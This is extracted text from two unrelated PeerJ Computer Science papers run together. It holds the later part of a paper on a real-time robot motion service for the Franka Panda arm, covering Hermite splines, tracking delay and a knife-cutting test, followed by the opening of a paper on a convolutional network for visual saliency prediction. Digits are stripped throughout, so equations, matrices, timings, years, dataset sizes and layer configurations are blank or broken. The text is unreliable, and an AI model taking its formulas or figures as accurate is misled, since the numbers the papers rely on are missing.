how an optional force-torque sensor may be added. such a force- torque sensor would typically be mechanically mounted between the wrist of the robot arm and the robot tool for measuring the wrench, w , on the tool. a force-torque sensor is not used in the presented setup and experiments. instead the estimated wrench, ŵ from the robot dynamics is used. this estimate is obtained as a feature from libfranka and provided by the ms to the ma. software mechanisms for understanding the general workings of the ms, this section gives a brief overview of the central mechanistic design. figure b shows a sequence diagram illustrating the central, operative synchronization and responsibility of the three threads of the ms code. in addition the network-remote entities fc and ma are modelled as threads with remote message interaction to the ms threads. in addition to this central, operative interaction the connection thread in the ms has a complex logic for maintaining control of the connection from an ma. this will not be treated here. even though the connection management, which enables the fc-ms interaction to be kept alive over repeated ma-sessions, the main focus of this paper is to describe the interpolation in the ms. also not illustrated in fig. b is the setup and initialization procedures of the ms, which establishes the real-time loop with the fc and prepares for receiving connections from an ma. like the connection maintenance, this is also important, but the details are not in the focus of this paper. a micro cycle is initiated by the callback from the fc to the responder thread in the ms, conveying the robot arm status. the responder thread is only responsible for conveying this trigger and status data to the updater thread, and for returning the prepared next micro setpoint to the fc obtained from the updater thread in response. upon receiving the new micro state and returning the next micro setpoint, updater thread is triggering itself to calculate the micro setpoint for the next micro cycle. when the updater thread is triggered to prepare the micro setpoint for the next micro cycle, it first updates its micro and macro cycle accounting, which determines whether a lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. new macro cycle is to be started. the current macro cycle is valid for the next micro cycle if the current spline domain is valid for the time of the next micro cycle. in that case, the current spline is used to prepare the next micro setpoint. if a new macro cycle is to be started, the updater triggers the connection thread, and the next macro setpoint is retrieved from it. if a valid new macro pose is retrieved, a new spline based on this is set up, and used for micro setpoint calculation. if not, due to late response or disconnect from the ma, a braking spline is generated. the severity of this braking spline depends on whether the missing macro setpoint was due to lateness or a broken connection. in the former case, only light braking will be generated, since it is expected that the ma will resume its responsiveness. in the latter case full deceleration braking is generated since the robot arm then must come to a full stop as fast as possible. the connection thread is, during operation in an ma-session, responsible for the interaction with the ma. it is triggered by the updater thread when a new macro cycle is started, which it propagates on to the ma. after triggering the ma, it expects to receive a new macro setpoint some time later, before the end of the newly started macro cycle. when a macro setpoint is received from the ma, a flag is set to tell that a new macro setpoint is received. this flag is checked by the updater thread, and is used to determine, if the ma was within its deadline. the updater clears the flag, preparing it for receiving the next macro setpoint from the ma. timing-wise, when the macro cycle is between macro setpoint i and i+ , a received macro setpoint is stored for use as the i+ ’th macro setpoint; i.e., one extra macro setpoint in the stream is retained. this delay is introduced to be able to correctly estimation the acceleration to target when splining toward i+ , calculated using the central acceleration estimator over the macro setpoints i+ , i+ , and i+ . the same principle is used for the velocity at macro setpoint i+ , which results in the average velocity on the segments i+ → i+ and i+ → i+ . the calculus of motion quantities at the macro trajectory points is based on the stream of joint positions received from the ma, which are assumed to arrive at regular times separated by the macro cycle time, δtmac. this stream of macro joint position vectors, {pi}i, is the fundamental input data from the ma to the ms. over these, the central discrete estimators of velocities and accelerations may be concisely expressed as p( )i+ = . [ pi+ −pi+ δtmac + pi+ −pi+ δtmac ] ( ) p( )i+ = pi+ − pi+ +pi+ δt mac ( ) these estimated first and second derivatives of the macro joint trajectory are used for calculating the splines, which are then sampled to generate the micro trajectory positions. hermite splines hermite spline and hermite interpolation are named in honour of the th century french mathematician charles hermite. general treatment on multi-node hermite splines of arbitrary order may be found in several publications and textbooks. e.g., spitzbart ( ) lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. focused on a general formulation for arbitrary order, while krogh ( ) focused on efficient computation of interpolation and numerical differentiation with continuous derivative. however, course notes by finn ( ) introduces an elegant formulation for the basis polynomials for cubic and quintic hermite interpolation. both have been implemented in the ms. the formalism can be concisely written, with the same enumeration of the basis functions, as p̃n(u)= (n− )/ ∑ i= p(i) h n i (u)+p (i) h n n−i(u) for u∈[ ; ] ( ) in eq. ( ) we assume an underlying trajectory p(u) of which we know p(i)τ =p (i)(τ) for i∈{ ..n− } and τ ∈{ , }, where p(i) is the i’th derivative of p. the basis functions for hermite interpolation to order n are denoted {hni }i∈{ ..n}. for cubic (n= ) and quintic (n= ) hermite interpolation the basis functions can be found listed in finn ( ). for completenes the coefficients are listed in matrix notation in eqs. ( ) and ( ). h =   − − − −   ( ) h =   − − − − − − − − − −   ( ) in an online or real-time system a change of variable is necessary for eq. ( ) to be applicable. when the system at run-time establishes a new interpolation segment it takes the form[t ;t ]withδtmac= t −t . introducing the substitution on the interval u(t)= t−t δtmac , and letting p(i)τ =p (i)(τ) for i∈{ ..n− } and τ ∈{t ,t }, the directly applicable version of eq. ( ) is p̃n(t)= (n− )/ ∑ i= (δtmac) i ( p(i)t h n i (u(t))+p (i) t hnn−i(u(t)) ) for t ∈[t ;t ] ( ) equation ( ) has been implemented in the ms code base for both cubic and quintic hermite splines, and can be used based on joint velocities and accelerations from the macroscopic trajectory which is fed from the ma. it is noteworthy that a piece-wise cubic hermite spline is a c -smooth function and a piece-wise quintic hermite spline is a c -smooth function. with respect to generating motion trajectories, the great difference between these is the jerk; the third derivative of the position trajectory. many motion controllers require being fed a limited-jerk trajectory, which is fulfilled by a c -trajectory, whereas a c -trajectory exhibits infinite jerk. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. experiments and results during development a cosine position trajectory generator have been used extensively. this section presents some results from such cosine trajectories. a cosine trajectory is used for testing, since it starts at zero speed, is cyclic, and is infinitely smooth (c∞). in addition to the testing by a cosine position trajectory, preliminary experiments have been performed using the force-torque estimation from the fc with a python-based framework, aimed at integrating force-feedback in a knife-cutting application. the cutting experiment does not utilize the real-time possibility of the motion service, but only serves to demonstrate its soundness from a simple application perspective. cosine joint motion a simple cosine motion is generated and the motion of a single joint is observed. this will first and foremost give insight into the tracking delay in the system. the presented results defines the tracking delay from the mc perspective as the time passed from receiving a macro setpoint from the ma until a status packet from the fc shows that the joint position have been achieved. figure b show a selected time range for the position trajectory of the moving joint. the time range have been selected to easily inspect the delays from the ma over the ‘‘franka ms’’ (fms), and to the report back from the fc. the observed delay between the ma and the fms is approximately ms with the delay from the fms to the reported fc position is another approximate ms. in total, for the trajectory execution we can estimate a ms delay. it is evident that there is an inherent tracking delay of approximately ms in the fc. this is affected by various filters and compliance parameters which are set at the initialization of the control loop through the fci. thus a lower inherent tracking delay may possible with more tight control parameters. particularly the experiments presented here have been using a value of . hz for the parameter cutoff_frequency in libfranka. this parameter controls, according to the documentation of libfranka, a first order low-pass filter. the reason for choosing a low cutoff frequency is observable as a ‘‘blackout’’ of two to three micro cycles near t = . s in fig. . such blackouts occurs generally every second, but not regularly. the reason for these blackouts have not been clarified, but they probably arise from running the system on a full desktop pc; i.e., there have been no stripping of services or other running processes on the pc to increase the real-time responsiveness. execution of a simple cosine motion in one joint also allows the observation of the difference between using cubic and quintic hermite splines. to this end, classes have been implemented in the fms code base for both of these. figure shows accelerations obtained by discrete derivation of the ma and fms trajectories for the observed joint. figure a shows the acceleration in a trajectory in a session where the fms runs with cubic hermite interpolation and fig. b shows the same type of cosine trajectory from a session using quintic hermite interpolation. the cubic hermite interpolation acceleration curve in fig. a is clearly discontinuous, which is consistent with its c -property. correspondingly the quintic hermite interpolation acceleration curve in fig. b is clearly continuous, which is consistent with its c -property. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a selected time range of the positions in a cosine trajectory. image credit: morten lind, . full-size doi: . /peerjcs. /fig- figure comparison of accelerations in the generated trajectories from a cosine motion using cubic and quintic hermite interpolation. (a) acceleration for cubic interpolation. image credit: morten lind, . (b) acceleration for quintic interpolation. image credit: morten lind, . full-size doi: . /peerjcs. /fig- simple cutting a simple application for a cutting experiment has been set up. this is an application where the robot tool is a knife and the task is to cut through a presented object. by simple cutting is meant moving the tool according to a pre-calculated trajectory; in contrast to sensor-based adaptive cutting where sensor input is used in the motion generation loop. the application in this experiment does not exploit the ability to make real-time generation of, or corrections to, the commanded trajectory. the purpose of the experiment is to do a simple demonstration of the robustness of the ms implementation and to get an indication of the reliability and stability of the wrist wrench estimation obtained from libfranka. the minimalistic setup used in the experiment is illustrated in fig. . figure a shows a photo of the knife held in the robot gripper and a test object; in this case a stick of eps strapped to a bracket. figure b illustrates the geometric setup of the knife. the knife shaft is held clamped in the gripper, and thus defines the commanded knife directions for cutting ĉc, which is perpendicular to the edge, and shearing ŝc, which is parallel to the edge. the actual cutting and shearing directions are defined by the knife edge at the point of interaction. these are illustrated as ĉa and ŝa, respectively. interpretation of the data for the recorded forces in a lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the setup of the knife and object. the cutting and shearing directions used for commanding the motion is aligned with the knife, whereas the actual cutting and shearing directions depend on the an- gle of the knife blade in the region of interaction.(a) photo of the setup of robot, knife, and object. photo credit: morten lind, . (b) illustration of controlled and actual cutting and shearing directions. image credit: morten lind, . full-size doi: . /peerjcs. /fig- figure position and force recording sampled through a cutting process. image credit: morten lind, . (a) commanded trajectory of the knife along the ĉc and ŝc directions. image credit: morten lind, . (b) forces acting on the knife along the ĉc and ŝc directions. image credit: morten lind, . full-size doi: . /peerjcs. /fig- cutting experiment is deeply dependent of the recognition of the relation between these commanded and actual directions. a cutting experiment is executed by moving the knife in a cyclic series of strokes, forward strokes in the positive ŝc direction and backward strokes in the negative ŝc direction, while progressing steadily in the positive ĉc direction. the motion of the knife happens thus in a plane spanned by the ĉc and ŝc. the commanded position trajectory is shown in fig. a. the origin of the positions is where the knife is held at the start of the cutting process. the corresponding forces on the knife along the ĉc and ŝc directions, based on the estimated wrench obtained from libfranka in the fms, is seen in fig. b. in an ideal experiment one would expect a constant, negative cutting force in the ĉc direction and a square wave shearing force, symmetric around zero, in the ŝc direction. both of these would be smoothly modulated in size by the initially increasing, and later decreasing, interaction of the knife with the object as it passes through it. there are a couple of deviations from this ideal, qualitative behaviour. most noteworthy is the non-smoothness of the direct cutting force. next is the asymmetry around zero of the shear force. both of these are easily understood by the illustration of the actual cutting and shearing directions observed in fig. b. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. discussion the current major challenge regards the blackouts in the communication between ma, fms, and fci. for a reliable and stable system, this must be addressed by real-time hardening of the computing environment on which the application runs. however, this is fairly unrelated to the soundness of the presented approach and reference implementation. particularly for knife-cutting applications, the discussion about a negative bias on the cutting and shearing forces, observed in fig. b, due to the deviation from the commanded directions, is interesting for future development. it shows that an edge-object-interaction observer should be developed, which will certainly be important for correct execution of the cutting process. the presented implementation will be used for future experiments in two directions involving real-time force feedback to the trajectory generation. firstly in the direction of explicitly modelling the cutting process, based on such work as that of reyssat et al. ( ). secondly, on the more implicit learning approach to cutting presented by lenz, knepper & saxena ( ). another application area, for which the presented implementation is intended, is that of grasping of unknown or variable objects. the vision-based servo control involved with ‘‘closed-loop grasping’’ is executing at a fairly low frequency; in the order of hz according to morrison, leitner & corke ( ). thus, whereas it is expected that the required frequency and tracking delay will be a challenge for a python-based application when it comes to real-time control of cutting, this is not expected to be a challenge for real-time grasping applications. it was originally under consideration to use the reflexxes (http://reflexxes.ws) library developed by torsten kröger for the underlying interpolation mathematics in the presented motion service process. however, the reflexxes version under a free software license, lgpl v . , only provides c -smooth trajectories. for generating c -smooth trajectories, a commercial license of reflexxes must be purchased. the presented software is intended to be free (gpl), and thus the reflexxes library was not chosen. conclusion in summary, this work has • established a re-connectable real-time motion service via the franka control interface for the panda robot; • characterized the real-time trajectory execution performance by illustrating the tracking delay; • demonstrated that real-time motion application from python is possible; • indicated the feasibility of using the external force-torque estimator provided by libfranka at the real-time application level. acknowledgements thanks to ekrem misimi at sintef ocean for general guidance and for supporting the work. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://reflexxes.ws http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the underlying work and the writing of this paper was funded by the norwegian research council (https://www.forskningsradet.no/en/) in the project ‘‘innovative and flexible food processing technology in norway’’ with project number (https://prosjektbanken.forskningsradet.no/#/project/nfr/ ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: norwegian research council. innovative and flexible food processing technology in norway: . competing interests morten lind is an employee of sintef manufacturing as. the author declares that he has no competing interests. author contributions • morten lind conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is publicly available in the ‘‘franka motion service" repository at gitlab: https: //gitlab.com/sintefmanufacturing/franka_motion_service.git. data are publicly available in the ‘‘fms test data" repository at https://gitlab.com/sintefmanufacturing/fms-test- data.git. references andersen tt. . optimizing the universal robots ros driver. technical report. technical university of denmark, department of electrical engineering. available at https://orbit.dtu.dk/en/publications/optimizing-the-universal-robots-ros-driver. andersen tt, amor hb, andersen na, ravn o. . measuring and modelling delays in robot manipulators for temporally precise control using machine learning. in: ieee th international conference on machine learning and applications (icmla). piscataway: ieee, – . eggen r, eggen m. . thread and process efficiency in python. in: proceedings of the international conference on parallel and distributed processing techniques and applications. – . lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.forskningsradet.no/en/ https://prosjektbanken.forskningsradet.no/#/project/nfr/ https://gitlab.com/sintefmanufacturing/franka_motion_service.git https://gitlab.com/sintefmanufacturing/franka_motion_service.git https://gitlab.com/sintefmanufacturing/fms-test-data.git https://gitlab.com/sintefmanufacturing/fms-test-data.git https://orbit.dtu.dk/en/publications/optimizing-the-universal-robots-ros-driver http://dx.doi.org/ . /peerj-cs. finn dl. . quintic hermite interpolation. course notes. available at https://studylib. net/doc/ /ma- -geometric-modelling-course-notes--day- -quintic-h.... krogh ft. . efficient algorithms for polynomial interpolation and numerical differentiation. mathematics of computation ( ): – doi . /s - - - -x. kröger t, wahl fm. . online trajectory generation: basic concepts for instantaneous reactions to unforeseen events. ieee transactions on robotics ( ): – doi . /tro. . . lenz i, knepper ra, saxena a. . deepmpc: learning deep latent features for model predictive control. in: kavraki le, hsu d, buchli j, eds. proceedings of robotics: science and systems xi. sapienza university of rome, rome: rss foundation. available at https://cs.stanford.edu/people/asaxena/papers/deepmpc_rss .pdf . lind m, schrimpf j, ulleberg t. . open real-time robot controller framework. in: lien tk, ed. cirp conference on assembly technologies and systems. no- , trondheim: tapir academic press, – . lind m, tingelstad l, schrimpf j. . real-time robot trajectory generation with python. in: workshop on robot motion planning: online, reactive, and in real-time. ieee/rjs. mihelj m, Šlajpah s, Čepon p, munih m. . ycontrol - open architecture controller for yaskawa motoman mh robot. in: ieee international conference on control applications. piscataway: ieee, – . morrison d, leitner j, corke p. . closing the loop for robotic grasping: a real-time, generative grasp synthesis approach. in: kress-gazit h, srinivasa ss, howard t, atanasov n, eds. proceedings of robotics: science and systems xiv, carnegie mellon university. pittsburgh: rss foundation doi . /rss. .xiv. . reyssat e, tallinen t, merrer ml, mahadevan l. . slicing softly with shear. physical review letters ( ): doi . /physrevlett. . . schrimpf j. . sensor-based real-time control of industrial robots. phd thesis, norwe- gian university of science and technology, trondheim, norway. schrimpf j, lind m, mathisen g.. . real-time analysis of a multi-robot sewing cell. in: ieee international conference on industrial technology (icit). piscataway: ieee, – . spitzbart a. . a generalization of hermite’s interpolation formula. the american mathematical monthly ( ): – doi . / . . . lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://studylib.net/doc/ /ma- -geometric-modelling-course-notes--day- -quintic-h... https://studylib.net/doc/ /ma- -geometric-modelling-course-notes--day- -quintic-h... http://dx.doi.org/ . /s - - - -x http://dx.doi.org/ . /tro. . https://cs.stanford.edu/people/asaxena/papers/deepmpc_rss .pdf http://dx.doi.org/ . /rss. .xiv. http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. submitted december accepted june published july corresponding author bashir muftah ghariba, bmg @mun.ca academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright ghariba et al. distributed under creative commons cc-by . open access a novel fully convolutional network for visual saliency prediction bashir muftah ghariba , , mohamed s. shehata and peter mcguire faculty of engineering & applied science, memorial university of newfoundland, st. john’s, nl, canada department of electrical and computer engineering, faculty of engineering, elmergib university, khoms, libya department of computer science, mathematics, physics and statistics, university of british columbia, kelowna, bc, canada c-core, st john’s, nl, canada abstract a human visual system (hvs) has the ability to pay visual attention, which is one of the many functions of the hvs. despite the many advancements being made in visual saliency prediction, there continues to be room for improvement. deep learning has recently been used to deal with this task. this study proposes a novel deep learning model based on a fully convolutional network (fcn) architecture. the proposed model is trained in an end-to-end style and designed to predict visual saliency. the entire proposed model is fully training style from scratch to extract distinguishing features. the proposed model is evaluated using several benchmark datasets, such as mit , mit , toronto, and dut-omron. the quantitative and qualitative experiment analyses demonstrate that the proposed model achieves superior performance for predicting visual saliency. subjects computer vision, data mining and machine learning keywords deep learning, convolutional neural networks, fully convolutional network, semantic segmentation, encoder-decoder architecture, human eye fixation introduction a human visual system (hvs) processes a part of the visual scene instead of the whole scene. this phenomenon is called human visual attention (hva), also referred to as visual saliency prediction, which is an important research area in the field of computer vision. hva is also known as human eye fixation prediction, visual saliency prediction, or saliency map detection. visual saliency prediction is also beneficial for other applications in the computer vision field, including salient object detection (liu & han, ), image retrieval (huang et al., ), multiresolution imaging (lu & li, ), and scene classification (cheng et al., ; lu, li & mou, ; yao et al., ). many models have been developed to predict visual saliency, the most popular being the saliency map. saliency maps describe the probability that each image pixel will attract human attention. in other words, saliency maps are images that display the unique qualities of each pixel in a given image (gao & vasconcelos, ). to produce a saliency map, the salient points in the image are collected and convolved with a gaussian filter (gao & vasconcelos, ). the probability that each pixel in the image will attract human attention is represented by a heat map or gray-scale image. notably, saliency maps smooth how to cite this article ghariba bm, shehata ms, mcguire p. . a novel fully convolutional network for visual saliency prediction. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:bmg @mun.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the image, making it more meaningful and easier to analyze. this is useful for condition image captioning architecture because it indicates what is salient and what is not (mackenzie & harris, ). to evaluate the saliency map, human eye fixation data in free viewing is used because there is a direct link between human eye movement and visual attention (mackenzie & harris, ). generally, hva runs on two approaches. the first is a bottom-up approach which utilizes low-level features, including intensity, color, edge orientation, and texture (gao, mahadevan & vasconcelos, ; le meur et al., ). such an approach attempts to decide regions that show obvious characteristics of their surroundings. the second is a top-down approach, which is task-driven and requires an explicit understanding of the context of the visual scene. moreover, it depends on the features of the object of interest (gao, han & vasconcelos, ; kanan et al., ). the deep convolutional neural network (cnn) is the most widely utilized deep learning method for image processing applications (mahdianpari et al., ). specifically, cnn is capable of extracting discriminant visual features (e.g., -d spatial features) by applying a hierarchy of convolutional filters using multiple nonlinear transformations. studies have also used convolutional neural networks (cnns) for studying saliency map detection to confirm the importance of end-to-end task learning and automatic feature extraction (fang et al., ; jetley, murray & vig, ; kruthiventi et al., ; pan et al., ; vig, dorr & cox, ). the deep cnn model achieves an even higher classification accuracy. for example, deep learning techniques have achieved superior results in multiple tasks, such as driverless car, scene classification, object (e.g., vehicle) detection, image classification, and semantic segmentation. however, deep learning architecture requires sufficient training data for superior performance on several sets of visual tasks, such as local image detection (girshick et al., ), global image classification (krizhevsky, sutskever & hinton, ), and semantic segmentation (long, shelhamer & darrell, ). although several deep learning models have been proposed to solve the problem of saliency prediction, and those models provide good performance. however, those models essentially proposed for object recognition and then fine-tuned for saliency prediction. consequently, the pixel-based classification of visual attention task remains challenging. this highlights the necessity of designing a novel fcn model specifically for the task of saliency prediction. in addition, our proposed model is designed for training from scratch. therefore, we added some modules (e.g., three inception modules and residual modules) to improve the model performance. the inception module is useful since benefits from filters with different sizes in one layer, which contribute to multi-scale inference and enhance contextual information. this highlights the necessity of combining feature maps at different resolution to extract useful information. in addition the residual module recovers more accurate information and simplifies optimization, while avoiding the vanishing gradient problem. in this study, we utilized an encoder–decoder structure based on the fully convolutional network (fcn) architecture to address the problem of bottom-up visual attention in visual saliency predication. fcn has the same architecture as the cnn network, but unlike cnn it does not contain any fully connected layers. fcns are also powerful visual models that ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. generate high-level features from low-level features to produce hierarchies. moreover, fcn utilizes multi-layer information and addresses pixel-based classification tasks using an end-to-end style (long, shelhamer & darrell, ). in addition, the proposed model also includes both inception and residual modules to improve multi-scale inference and the recovery of more accurate information, respectively. this study proposes a new model based on an encoder–decoder structure (i.e., fcn) to improve the performance of visual saliency prediction. the specific contributions of this work are as follows: ( ) a new model of fcn architecture for visual saliency prediction that uses two types of modules is proposed. the first module contains three stages of inception modules, improves the multi-scale inference, and performs contextual information. the second module contains one stage from the residual module and also recovers more accurate information and simplifies optimization, while avoiding the vanishing gradient problem. ( ) four well-known datasets, including toronto, mit , mit , and dut- omron, were used to evaluate the proposed model. the experiments demonstrate that the proposed model achieves results comparable or superior to those of other state-of-the-art models. the remainder of this article is organized as follows. first, the proposed model is described in more detail in ‘related work’ and the materials and methods used to produce and evaluate the proposed model are discussed in ‘material and methods’. ‘experimental results’ presents the quantitative and qualitative experimental results obtained from the four datasets. finally, the results are summarized, and possible future uses and applications of the proposed model are explored in ‘discussion’. related work visual saliency prediction has received attention from computer vision researchers for many years. the earliest computational model was introduced by koch and ullman (krizhevsky, sutskever & hinton, ), which inspired the work of itti, koch & niebur ( ). this model combines low level features at multiple scales to generate saliency maps. subsequently, many models have been proposed to address visual saliency detection (fu et al., ; gong et al., ; guo et al., ; li et al., ; liu et al., ; liu et al., a; liu, zou & meur, b; wang & shen, ; wang et al., a; wang et al., ; wang et al., b). most of this work has been focused on how to detect visual saliency in an image/video using different methods (borji & itti, ; wang, shen & shao, a; wang et al., b). most conventional attention models are based on a bottom-up strategy. these contain three important steps to detect visual saliency: feature extraction, saliency extraction, and saliency combination. salient regions in the visual scene are first extracted from their surroundings through hand-crafted low-level features (e.g., intensity, color, edge orientation, and texture), and center–surround contrast is widely used for generating saliency. the saliency may also be produced by the relative difference between the region and its local surroundings (itti, koch & niebur, ; harel, koch & perona, ; bruce & ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tsotsos, ). the last step for saliency detection combines several features to generate the saliency map. recently, many visual saliency models have been introduced for object recognition. deep-learning models achieved better performance compared to non-deep learning models. the deep neural networks (dnn) (vig, dorr & cox, ), was trained from scratch to predict saliency. subsequent models were based on pre-trained models, for example, the deepgaze i model (kümmerer, theis & bethge, ), which was the first to be trained on a pre-trained model (alexnet krizhevsky, sutskever & hinton, ) trained on imagenet (deng et al., ), and outperformed the training stage from scratch. deepgaze ii (kümmerer, wallis & bethge, ) has also has been proposed based on a pre-trained model (vgg- simonyan & zisserman, ), where attention information was extracted from the vggnet without fine-tuning the attention task. next, the deepfix model kruthiventi, ayush & babu ( ) was proposed by kruthiventi et al. based on a pre-trained model vgg- . furthermore, in mahadevan & vasconcelos ( ) object detection and saliency detection were carried out using a deep convolutional neural network (cnn). finally, the salicon net model (huang et al., ) was proposed to capture multi-scale saliency using combined fine and coarse features from two-stream cnns that were trained with multi-scale inputs. since the superior success of transfer learning models for visual saliency prediction has been established, several new models have been proposed that have improved saliency prediction performance. for instance, the salicon model fine-tunes a mixture of deep features (huang et al., ) using alexnet (krizhevsky, sutskever & hinton, ), vgg- network (simonyan & zisserman, ), and googlenet (szegedy et al., ) for visual saliency prediction. pdp (jetley, murray & vig, ) and deepfix (kruthiventi, ayush & babu, ) were used on the vgg- network for the same task using mit and the salicon dataset, and fucos (bruce, catton & janjic, ) fine-tunes features that were trained on the pascal dataset. overall, deepfix and salicon models demonstrated significantly improved performance compared to deepgaze i in the mit benchmark. material and methods proposed model the proposed model follows an fcn structure (i.e., a pixel-based approach) and the generic encoder–decoder form. the important difference between cnn and fcn networks is that the latter has learning filters throughout its structure. even the decision-making layers at the end of the network are filters. fcns also do not have any fully connected layers that are usually available at the end of the network. figure explains the architecture of the proposed model for visual saliency prediction and the configuration of the proposed model is explained in table . the encoder stage contains three blocks of convolution layers, each of which is followed by batch normalization, rectified linear unit (relu), and max pooling. the encoder stage is the same as that of a conventional cnn and generates feature maps by down-sample pooling. the decoder stage also transposes convolutional layers but does so in the opposite direction. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure architecture of the proposed model. full-size doi: . /peerjcs. /fig- table configuration of the proposed model. layer type filter size encoder convolution × , residual module (*), convolution × , max pooling × convolution × , max pooling × decoder inception module (*), transposed convolution × , convolution × , convolution × , transposed convolution × , convolution × , pixel classification layer − therefore, the decoder stage produces label maps (up-sampling) with the same input image size. the transposed convolution layers contain un-pooling and convolution operators. unlike the max-pooling operation, the un-pooling operation increases the size of feature maps through the decoding stage. in addition, the image input size of the proposed model is × pixels. figure illustrates the proposed model architecture to predict visual saliency. three inception modules are also used in the proposed model. inception modules are useful because they benefit from different sized filters in one layer, which contributes to the multi-scale inference and enhances contextual information (long, shelhamer & darrell, ). in addition, a residual module is also added to the proposed model because it effectively avoids the vanishing gradient problem by introducing an identity shortcut connection (lin et al., ). moreover, activations from a previous layer are reused by the residual module for the adjacent layer to learn its weights. figure shows the architecture of the inception and residual modules, respectively. figure a explains the layers of the inception module which contains three branches. the first two contain a sequence of two convolution filters, where the patch sizes of the layers are × , the second layer is × , and ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure architecture of (a) inception and (b) residual modules. full-size doi: . /peerjcs. /fig- table configuration of inception and residual modules. module convolutional configuration operation output inception × , × , × , × , × , concatenation residual × , × , × , × , element-wise sum the last layer is × , respectively. the third branch contains only one convolutional filter which has a patch size of × . each convolutional layer is followed by batch normalization and relu. figure b explains the structure of the residual module, which contains two branches. the first branch has a stack of three convolutional filters, sized × , × , and × , respectively. the second branch has a single × convolutional filter. the two branches are combined by element-wise summation. table explains the number of each filter in the two modules (i.e., inception and residual). notably, the convolutional module contains a convolutional d, batch normalization, as well as a relu layer. the transposed convolutional module also contains the same layers as the convolutional module. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. semantic segemnation the segmentation task plays an important role in image understanding and is essential for image analysis tasks (karami, shehata & smith, ). in semantic segmentation, each region or pixel is labeled as a class, such as flower, person, road, sky, ocean, or car. many applications use semantic segmentation techniques, such as autonomous driving, bio medical image diagnosis, robotic navigation, localization, and scene understanding. furthermore, deep neural networks (dnns) are commonly used as effective techniques for semantic segmentation (long, shelhamer & darrell, ). semantic segmentation works with semantics and location; global information determines the ‘‘what’’ while local information determines the ‘‘where’’ of an image. deep feature hierarchies encode semantics and location in a nonlinear local-to-global pyramid (long, shelhamer & darrell, ). our proposed model (i.e., fcn) uses semantic segmentation techniques to assign each pixel in the given image into appropriate classes (i.e., foreground or background) in order to predict visual saliency (i.e., saliency map generation). datasets the proposed model was trained using a standard available dataset (i.e., salicon) and subsequently tested on four other well-established datasets, including toronto, mit , mit , and dut-omron. all these datasets have different characteristics and so each is described below. salicon the largest dataset for visual attention applications on the popular microsoft common objects in context (ms coco) image database is salicon (lin et al., ). this dataset contains , training, , validation, and , testing images with a fixed resolution of x . while this dataset contains the ground truth data for the training and validation datasets, the test dataset ground truth data were unavailable (jiang et al., ). toronto one of the most widely used datasets for visual attention is the toronto dataset. it has color images with a resolution of x pixels. this dataset contains images that were captured in indoor and outdoor environments and has been free-viewed by human subjects (bruce & tsotsos, ). mit the mit dataset has natural images and the eye-tracking data of users who free viewed these images were used to generate saliency maps. this dataset is challenging since its images are highly variable and natural (judd, durand & torralba, ). a mit saliency benchmark website for model evaluation (http://saliency.mit.edu/results_mit .html) is available to evaluate any saliency model using this dataset. mit mit includes , images from the flicker and labelme collections. saliency maps of these images have also been generated from the eye-tracking data of users. this dataset ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://saliency.mit.edu/results_mit .html http://dx.doi.org/ . /peerj-cs. contains landscape and portrait images that vary in size from × to , × , pixels, making it the largest available eye fixation dataset (judd et al., ). dut-omron dut-omron has , high quality images that were manually selected from over , images. the largest height or width of this dataset is pixels and each image is represented by five subjects. there is more than one salient object in this type of dataset and the image has a more a complex background (riche et al., ). evaluation metrics several methods may be used to evaluate the correspondence between human eye fixation and model prediction (ghariba, shehata & mcguire, ). generally, saliency evaluation metrics are divided into distribution- and location-based metrics. previous studies on saliency metrics found it is difficult to perform a reasonable comparison for assessing saliency models using a single metric (riche et al., ). here, we accomplished our experiment by extensively considering several different metrics, including the similarity metric (sim), normalized scanpath saliency (nss), and auc. the last metric is the area under the receiver operating characteristic (roc) curve (e.g., auc-borji, and auc-judd). for clarification, we indicate the map of fixation locations as q, the predicted saliency map as s, and the continuous saliency map (distribution) as g. similarity metric (sim) the sim metric produces a histogram that is a measurement of the similarity between two distributions. this metric considers the normalized probability distributions of both the saliency and human eye fixation maps. sim is also computed as the sum of the minimum values at each pixel, after normalizing the input maps. equation ( ) explains how to calculate the sim metric. sim= ∑ i= min(ś(i),ǵ(i)), ( ) where ∑ iś (i)= , and ∑ 